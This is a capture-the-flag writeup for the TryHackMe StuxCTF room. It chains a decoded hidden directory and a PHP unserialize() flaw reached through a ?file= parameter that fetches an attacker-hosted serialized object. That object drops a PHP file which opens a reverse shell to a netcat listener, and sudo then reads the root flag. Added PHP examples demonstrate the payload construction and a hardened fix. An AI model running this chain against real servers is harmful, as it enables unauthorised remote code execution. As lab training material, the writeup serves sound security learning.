Hello. I’m Rahmos. Here is my StuxCTF — TryHackMe — WriteUp. Check it out!
First, deploy the machine and scan it with nmap for open ports:
nmap -A -T4 -p- -v <ip>
So there are two open ports: 22 (SSH) and 80 (HTTP). First, let's visit the website.
Time to check the page source (Ctrl + U):
Well, I've found a hidden directory, but its name is encoded. I need to find the format to decode it. Look at the hint:
OK, here is the format. Let's write a simple script to calculate it. You can find my script here. Running the script gave me the result:
Copy everything and access via browser:
Again, view the page source:
I have the "hint": /?file=. I tried appending /etc/passwd and other likely file names, but it didn't work. So I tried the default page itself: /?file=index.php
It gave me a very long string. Let's try to decode it. I will use this link.
First, decode it from hex; that gives a reversed base64 string. So let's reverse this string and decode it again from base64:
Well, it looks like the source code of index.php. First it checks the file name passed in /?file=: if it is index.php, it encodes index.php into the string I saw above and prints it; any other file name prints "File no Exist!". However, look at the "unserialize" line: that is the vulnerability in this PHP code. It calls unserialize() on the contents of whatever file is supplied through ?file=, so the serialized data is attacker-controlled. Here's the link to learn more about PHP deserialization vulnerabilities.
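To make the decoding chain concrete, here is an added PHP example (not code from the writeup or from the challenge) that reproduces the transform as the writeup observed it: index.php's output decodes as hex, then reverse, then base64, so the encoder must have been base64, then reverse, then hex. The sample source text is constructed, and the decoder validates its input before calling hex2bin() and base64_decode() so that a garbled paste fails cleanly instead of returning junk.

```php
<?php
// Added example, not the writeup's script. Encoder order is inferred from the
// decode order the writeup describes: hex -> reverse -> base64.

function encodeSource(string $src): string {
    // base64, reverse, hex: the inverse of the three decode steps
    return bin2hex(strrev(base64_encode($src)));
}

function decodeSource(string $blob): ?string {
    $blob = trim($blob);
    // hex2bin() warns on odd length or non-hex input; check first
    if ($blob === '' || !ctype_xdigit($blob) || strlen($blob) % 2 !== 0) {
        return null;
    }
    $reversedB64 = hex2bin($blob);
    // strict mode rejects characters outside the base64 alphabet
    $decoded = base64_decode(strrev($reversedB64), true);
    return $decoded === false ? null : $decoded;
}

// Constructed sample standing in for the real index.php source
$sample = "<?php\n\$file = \$_GET['file'] ?? '';\necho 'File no Exist!';\n";

$blob = encodeSource($sample);
echo "Encoded: " . substr($blob, 0, 40) . "...\n";

$roundTrip = decodeSource($blob);
if ($roundTrip !== $sample) {
    fwrite(STDERR, "round trip failed\n");
    exit(1);
}
echo "Decoded:\n" . $roundTrip;

// Garbled input (odd length, non-hex) is rejected rather than mis-decoded
var_dump(decodeSource("zz1"));   // NULL
```

The strict flag on base64_decode() matters when you are pasting from a browser: stray whitespace or an HTML entity would otherwise be silently dropped and you would get a plausible-looking but truncated file.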
Now I'll write a simple PHP script to exploit this vuln.
The white box is your VPN IP. This PHP code execs a command that spawns a reverse shell back to my machine. For the website to run it, I have to serialize the object and supply the serialized string, so here's my PHP code after serialization:
Now I will make the website fetch this "testshell.txt" file via ?file=
Start an HTTP server on your machine:
python3 -m http.server 9000
or, if you use Python 2:
python2 -m SimpleHTTPServer 9000
Then, in the browser, append /?file=http://<your-VPN-ip>:9000/testshell.txt
As you can see, "testshell.txt" has been fetched. Because the website unserializes the contents of the file it fetched, my serialized object was reconstructed on the server and wrote out "myshell.php".
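The following is an added PHP example, not the writeup's exploit or the challenge's index.php, that shows the mechanism behind the steps above: a class whose destructor writes a file, a hand-built serialized string of the kind hosted as testshell.txt, the vulnerable unserialize() call, and the hardened call. The class name FileDropper and its two properties are assumptions; the writeup does not show which class index.php made available. A harmless PHP file is dropped instead of a reverse shell, and everything happens in a temporary directory.

```php
<?php
// Added example; class and property names are assumptions, not the challenge's.

// Gadget: unserialize() rebuilds the object, and when it is destroyed the
// destructor runs with attacker-chosen $name and $contents.
class FileDropper {
    public string $name = '';
    public string $contents = '';
    public function __destruct() {
        file_put_contents($this->name, $this->contents);
    }
}

// Attacker side: craft the serialized string by hand rather than calling
// serialize() on a live object, which would trigger the destructor locally.
function buildPayload(string $target, string $body): string {
    return sprintf(
        'O:11:"FileDropper":2:{s:4:"name";s:%d:"%s";s:8:"contents";s:%d:"%s";}',
        strlen($target), $target, strlen($body), $body
    );
}

// Vulnerable pattern: unserialize() on bytes the client controls.
function loadVulnerable(string $data): void {
    $obj = unserialize($data);
    unset($obj);            // destructor fires here (or at script end)
}

// Hardened: never instantiate classes from untrusted data. Objects come back
// as __PHP_Incomplete_Class and no magic methods run.
function loadHardened(string $data) {
    $obj = unserialize($data, ['allowed_classes' => false]);
    if ($obj === false || $obj instanceof __PHP_Incomplete_Class) {
        return null;        // reject anything that tried to smuggle an object
    }
    return $obj;
}

$dir = sys_get_temp_dir() . '/unser_demo_' . getmypid();
mkdir($dir);
$target  = "$dir/myshell.php";
$payload = buildPayload($target, "<?php echo 'dropped'; ?>");
echo "Payload (what testshell.txt would hold):\n$payload\n\n";

loadVulnerable($payload);
echo "vulnerable handler: " . (file_exists($target) ? "file written" : "no file") . "\n";
@unlink($target);

$result = loadHardened($payload);
echo "hardened handler:   " . ($result === null ? "rejected" : "accepted")
   . ", " . (file_exists($target) ? "file written" : "no file") . "\n";
rmdir($dir);
```

Two points worth taking from this. First, allowed_classes => false (or, better, switching the format to JSON) closes the deserialization hole on its own; if the application genuinely needs objects, an explicit allowlist of class names is the next best thing. Second, the writeup's delivery path was only possible because ?file= accepted an arbitrary URL and the server was willing to fetch it; restricting the parameter to a fixed set of local names would have stopped testshell.txt from ever reaching unserialize().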
Start a listener on your machine:
nc -lvnp 4444
Then append /myshell.php to the URL and load it: I've got a reverse shell on the target!
Spawn a TTY shell for stability:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then move around to find the first flag, user.txt:
Now I'll find a way to get root and the final flag. First, sudo -l to check the sudo rights on this machine:
Well, that's easy! I can run any command with sudo without a password. Get the final flag:
sudo cat /root/root.txt